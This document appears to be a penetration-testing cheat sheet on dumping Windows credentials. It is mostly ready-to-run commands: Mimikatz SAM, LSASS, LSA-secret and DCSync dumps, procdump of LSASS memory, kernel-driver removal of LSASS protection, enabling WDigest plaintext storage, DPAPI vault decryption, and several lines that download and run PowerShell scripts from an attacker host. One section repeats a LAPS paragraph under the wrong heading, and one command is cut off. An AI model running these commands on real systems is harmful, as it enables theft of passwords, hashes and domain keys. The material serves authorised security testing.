Dumping Credentials

Dumping Windows credentials is a common technique used to assess the security posture of a network. It involves extracting sensitive information like usernames and passwords, which can be a goldmine for attackers if addressed.

This section explores some of the key methods employed during penetration testing to dump Windows credentials.

Mimikatz

Once you are the administrator on a Windows system, you can retrieve NTLM hashes of the system accounts with .

Most of the following commands will require to add "privilege::debug" "token::elevate"to become NT-AUTHORITY\SYSTEM from Administrator, unless you already are NT-AUTHORITY\SYSTEM.

The use of mimikatz is as follows:

module::command <patarmeter>

SAM (Local Windows credentials) - Local

ℹ️ SYSTEM (or local administrator) permissions

Local Windows credentials are stored in the Security Account Manager (SAM) database as password hashes using the NTLM hashing format.

There are several alternatives to obtain the SAM database using a cmd.exe prompt with high privileges

"privilege::debug" "token::elevate" "lsadump::sam" "exit"

In case you can't obtain SAM credentials, it might be because the SAM and SYSTEM are mounted, but there are several workarounds to obtain them.

Obtain SAM & SYSTEM (ShadowCopy)

1. Create a shadow copy.

wmic shadowcopy call create Volume='C:\'

1. List the shadow copies to check that has been performed successfully.

vssadmin list shadows
[...]
Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
[...]

1. Copy the files to your folder

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\Windows\Tasks\sam
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\Windows\Tasks\system

Obtain SAM & SYSTEM (Windows Registry)

The SAM and SYSTEM files can be obtained from the Windows Registry.

reg save HKLM\sam C:\Windows\Tasks\sam
reg save HKLM\system C:\Windows\Tasks\system

Decrypt SAM with SYSTEM creds

Once you have obtained the SAM and SYSTEM files, you can use creddump7 or Mimikatz to obtains the machine's credentials.

pip2.7 install pycryptodome
git clone https://github.com/Neohapsis/creddump7
python2.7 creddump7/pwdump.py system sam

• Mimikatz

"lsadump::sam /system:.\system /sam:.\sam" "exit"

• Secretdumps (Local)

secretsdump.py -sam SAM -system SYSTEM [-SECURITY SECURITY] local

Local Administrator Password Solution (LAPS)

LAPS addresses the security challenge of managing local administrator account passwords by automatically and regularly rotating them. This helps to minimize the risk associated with using static or shared passwords across multiple systems.

LAPS introduces two new attributes for the computer object into Active Directory. The first is ms-mcs-AdmPwdExpirationTime, which registers the expiration time of a password as directed through a group policy. The second is ms-mcs-AdmPwd, which contains the clear text password of the local administrator account.

There are several ways to detect if LAPS is enabled on the domain or the current machine you have to:

• Local: Check if the following files exists.

Get-ChildItem "$env:ProgramFiles\LAPS\CSE\Admpwd.dll"
Get-ChildItem 'C:\Program Files\LAPS\CSE\Admpwd.dll'
Get-ChildItem 'C:\Program Files (x86)\LAPS\CSE\Admpwd.dll'

• Domain:

# Alternative 1
(new-object system.net.webclient).downloadstring('http://<YOUR_IP>/powerview.ps1') | IEX
get-netcomputer -Filter "(ms-mcs-admpwdexpirationtime=*)" | select dnshostname
​
# Alternative 2
(new-object system.net.webclient).downloadstring('http://<YOUR_IP>/LAPSToolkit.ps1') | IEX;  Find-LAPSDelegatedGroups

There are several alternatives to obtain the LAPS password.

Alternative 1 - LAPSToolkit

(new-object system.net.webclient).downloadstring('http://<YOUR_IP>/powerview.ps1') | IEX
(New-Object System.Net.WebClient).DownloadString('http://<YOUR_IP>/LAPSToolkit.ps1') | IEX; 
# List all computers that are set up with LAPS and display the hostname, the clear text password, and the expiration time
Get-LAPSComputers

Alternative 2 - Get-ADObject

(new-object system.net.webclient).downloadstring('http://<YOUR_IP>/PowerView.ps1') | IEX
Get-ADObject -Name <COMPUTER_NAME> -DomainController <DC_IP> -Properties ms-mcs-admpwd

Alternative 3 - Metasploit

use post/windows/gather/credentials/enum_laps
set session 1
exploit

Alternative 4 - Get-LAPSPasswords

(New-Object System.Net.WebClient).DownloadString('http://<YOUR_IP>/Get-LAPSPasswords.ps1') | IEX;
Get-LAPSPasswords -DomainController <DC> -Credential <DOMAIN>\administrator

Local Security Authority Subsystem Service (LSASS)

LAPS addresses the security challenge of managing local administrator account passwords by automatically and regularly rotating them. This helps to minimize the risk associated with using static or shared passwords across multiple systems.

Extracting credentials from the memory of processes that handle user logon sessions.

"privilege::debug" "token::elevate" "sekurlsa::logonPasswords" "lsadump::secrets" "exit"

Local Security Authority (LSA) Protection Evasion

Check if it is PPL protection is enabled:

Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL"

To disable PPL protection protection we need to parch the kernel adding a new driver with the file mimidrv.sys and then disable PPL protection.

However, there are three approaches:

mimidrv.sys - Mimikatz.exe

Upload mimidrv.sys and mimikatz.exe on the same folder, so Mimikatz can find the file and create the service.

mimidrv.sys - Invoke-Mimikatz

Sadly Invoke-Mimikatz doesn't look for the file mimidrv.sys so we need to execute the service by ourselfs. To do so, we need to upload mimidrv.sys to folder that the system can access and then:

cmd /c 'sc create mimidrv binPath= C:\Windows\Tasks\mimidrv.sys type= kernel start= demand'
cmd /c 'sc start mimidrv'

Disable PPL

This command does:

1. Become "NT AUTHORITY / SYSTEM" to load the driver

2. Loads minidrv.sys

3. Disable the PPL protection for LSASS

4. Dump cached credentials

5. Dump secrets from the registry

"privilege::debug" "token::elevate" "!+" "!processprotect /process:lsass.exe /remove"  "sekurlsa::logonpasswords" "lsadump::secrets"  "sekurlsa::dpapi" "exit"

PPLKiller

This is a different alternative so you do not have to use mimikatz to load the kernel driver.

2. Install the driver PPLKiller.exe /installDriver first to install the driver

3. Disable the protection PPLKiller.exe /disableLSAProtection

4. Obtain the information.

"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::secrets"  "sekurlsa::dpapi" "exit"

Dumping LSASS process memory

Because the memory of LSASS process might contain plaintext credentials NTLM hashes or Kerberos tickets. Thus, it is useful to dump its memory for an offline processing. This can be achieved in two different ways:

• GUI Alternative:

1. Open Task Manager and go to "Details" tab

2. Look for "lsass.exe" process

3. Right click "Create Dump File"

• CLI:

As Authority system, execute the following command:

.\procdump64.exe -accepteula -ma lsass.exe lsass.dmp

Finally, extract logon passwords:

.\mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"

Data Protection API (DPAPI)

The Data Protection API (DPAPI) is a feature in Windows operating systems that provides a way to encrypt and decrypt sensitive data by using the user or machine credentials as a key. It is designed to help developers protect user data by providing a simple yet effective way to encrypt and decrypt data.

DPAPI is commonly used by applications to protect user data, such as web browsers to store user passwords, email clients to store user credentials, and other applications that store sensitive information.

The way the Windows Credential Manager works is a bit confusing at first - if you read up on the subject, you'll find both the terms "Vaults" and "Credentials". A "vault" essentially holds records of encrypted credentials and a reference to the encrypted blobs. Windows has two vaults: Web Credentials (for storing browser credentials) and Windows Credentials (for storing credentials saved by mstsc, etc). A "credential" is the actual encrypted credential blob.

The credentials are usually stored at C:\Users\<USER>\AppData\Local\Microsoft\Credentials.

Enumerate

There are several ways to list the vaults.

• VaultCMD

vaultcmd /list
vaultcmd /listcreds:"<VAULT>" /all

• Seatbelt

# Credentials saved in the Windows Vault (i.e. logins from Internet Explorer and Edge).
.\Seatbelt.exe WindowsVault 

# Windows credential DPAPI blobs
.\Seatbelt.exe WindowsCredentialFiles
====== WindowsCredentialFiles ======

  Folder : C:\Users\User\AppData\Local\Microsoft\Credentials\

    FileName     : 6C33AC85D0C4DCEAB186B3B2E5B1AC7C
    Description  : Local Credential Data
    MasterKey    : bfc5090d-22fe-4058-8953-47f6882f549e
    
# List DPAPI master keys
.\Seatbelt.exe DpapiMasterKeys
Folder : C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104 
LastAccessed  Last codified  FileName
============  =============  ====================================
1/16/2023     5:56:24 PM     487e7db0-f4fh-4301-8248-c225d49c5ah7 
1/16/2023     5:56:35 PM     bfc5090d-22fe-4058-8953-47f6882f549e 

[*] Use the Mimikatz "dpapi::masterkey" module with appropriate arguments (/pvk or /rpc) to decrypt [*] You can also extract many DPAPI masterkeys from memory with the Mimikatz "sekurlsa::dpapi" module [*] You can also use SharpDPAPI for masterkey retrieval 

Obtaining the keys

.\mimikatz.exe !sekurlsa::dpapi

#  This will only work if executed in the context of the user who owns the key.  If your Beacon is running as another user or SYSTEM, you must  impersonate the target user somehow first, then execute the command  using the `@` modifier.
mimikatz dpapi::masterkey /rpc /in:C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<FOLDER>\<MASTER_KEY> 

Vaul decryption

"dpapi::cred /in:C:\Users\<USER>\AppData\Local\Microsoft\Credentials\<VAULT_FILENAME> /masterkey:<MASTERKEY>" "exit"

Scheduled Tasks Credentials

Inside some scheduled tasks might be user credentials stored at C:\Window\system32\config\systemprofile\AppData\Local\Microsoft\Credentials.

These credentials can be decrypt with the following commands:

1. Obtining the GUID master key

.\mimikatz.exe "dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\<FILE_NAME>"

2. Dump the creds

.\mimikatz.exe "privilege::debug" "token::elevate" "!sekurlsa::dpapi" "exit"

3. Decrypt the credentials

.\mimikatz.exe dpapi::cred /in:C:\Windows\System32\config\syst

Kerberos Encryption Keys

Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::ekeys"'

.\SafetyKatz.exe "sekurlsa::ekeys"

WDigest Authentication

When the WDigest Authentication protocol is enabled, plain text passwords are stored in the Local Security Authority Subsystem Service (LSASS) exposing them to the pentester.

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
.\mimikatz.exe "sekurlsa::wdigest"

Dumping secrets

Originally, the LSA secrets contained cached domain records. Later, Windows developers expanded the application area for storage. At this moment, they can store PC users' text passwords, service account passwords (for example, those that must be run by a certain user to perform certain tasks), Internet Explorer passwords, RAS connection passwords, SQL and CISCO passwords, SYSTEM account passwords, private user data like EFS encryption keys, and a lot more. For example, the NL$KM secret contains the cached domain password encryption key.

.\mimikatz.exe "token::elevate" "lsadump::secrets" "exit"

secretsdump [-just-dc] <DOMAIN>/<USERNAME>:'<PASSWORD'@<DC>

VPN credentials

It might be the case that you have compromised a computer that contains VPN profiles with a Pre-Shared Key and stored user credentials.

The general information of the VPN like the domain or IP address, will be found in:

C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk

In order to dump the information, you need to dump the lsadump::secrets looking for the secret "L$_RasConnectionCredentials".

"privilege::debug" "token::elevate"  "lsadump::secrets" "exit"
[...]
Secret  : L$_RasConnectionCredentials#0
cur/hex : 30 00 00 00 00 00 05 00 30 80 ab 62 21 85 f3 42 8a 33 26 87 51 46 82 20 0e 00 00 00 73 00 65 00 63 00 72 00 65 00 74 00 00 00 00 00 00 00 00 00 48 00 00 00 00 00 05 00 b5 b0 fe 50 59 98 6d 49 8f 31 4e 4c 77 24 4f 5a 28 00 00 00 79 00 6f 00 75 00 72 00 5f 00 70 00 72 00 65 00 5f 00 73 00 68 00 61 00 72 00 65 00 64 00 5f 00 6b 00 65 00 79 00 00 00 00 00 00 00 50 00 00 00 00 00 05 00 d4 dd fb 7c b6 f3 49 47 99 52 56 e9 ef 91 76 41 2a 00 00 00 76 00 70 00 6e 00 5f 00 31 00 5f 00 70 00 72 00 65 00 2d 00 73 00 68 00 61 00 72 00 65 00 64 00 5f 00 6b 00 65 00 79 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 00 00 00 05 00 5a 39 4b 1f 87 b1 0a 4e aa ad c0 56 3a 3d c1 91 2a 00 00 00 76 00 70 00 6e 00 5f 00 32 00 5f 00 70 00 72 00 65 00 2d 00 73 00 68 00 61 00 72 00 65 00 64 00 5f 00 6b 00 65 00 79 00 00 00 00 00 00 00 00 00 00 00 00 00

After decoding the values from HEX, the Pre-Shared keys will appear as follows, with three "NULL" bytes at the beginning and end of the password.

Then, if the user has stored the credentials, they will appear under the secret "RasDialParams!S-1-5-21-...".

DSync

Performs a DSync process, obtaining the Kerberos krbtgt keys, domain secrets, etc.

Invoke-Mimikatz -Command '"lsadump::dcsync /user:<DOMAIN>\krbtgt"

Browser Credentials

Some credentials might be stored on the victim's browser. These credentials can be found stored in any of the following paths:

Appdata\\Roaming\\Mozilla\\Firefox\\Profiles\\
AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\\
AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data\\

If any of those paths exists, they might be stored credentials on the browser.

References